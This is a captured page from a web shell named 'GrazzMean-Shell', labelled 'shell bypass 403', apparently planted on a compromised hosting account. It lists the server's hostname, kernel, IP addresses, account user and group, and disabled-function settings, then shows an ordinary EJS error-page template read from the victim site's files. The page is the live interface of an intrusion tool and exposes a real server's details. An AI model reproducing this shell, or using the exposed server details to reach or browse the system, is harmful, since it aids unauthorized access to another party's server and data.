shell bypass 403

GrazzMean-Shell Shell

: /home/allssztx/needapair.com/public/ [ drwxr-xr-x ]
Uname: Linux business55.web-hosting.com 4.18.0-553.lve.el8.x86_64 #1 SMP Mon May 27 15:27:34 UTC 2024 x86_64
Software: LiteSpeed
PHP version: 8.1.31 [ PHP INFO ] PHP os: Linux
Server Ip: 162.213.251.212
Your Ip: 18.216.81.181
User: allssztx (535) | Group: allssztx (533)
Safe Mode: OFF
Disable Function:
NONE

name : error.ejs
<!DOCTYPE html>
<html>

<head>
    <title> Home </title>
    <meta charset="UTF-8">
    <meta name="keywords" content="HTML, CSS, JavaScript">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <%- include('./parcials/cssLinks') %>
</head>

<body>
    <%- include('./parcials/header') %>
        <main>
            <section class="error-sec">
                <div class="container">
                    <h2 class="theme-h2">Error <%= statusCode %> <%= errorMessage %></h2>
                    <% if(error){ %>
                    <p class="theme-p"><%= error %></p>
                    <% }else { %>
                    <p class="theme-p">Sorry, the page you're looking for cannot be found. Please check the URL and try again.</p>
                    <% } %>
                    <a href="javascript:;window.history.back()" class="theme-btn mx-auto">Go Back</a>
                </div>
            </section>
        </main>
        <%- include('./parcials/footer') %>
            <%- include('./parcials/scriptLinks') %>
</body>

</html>
© 2025 GrazzMean-Shell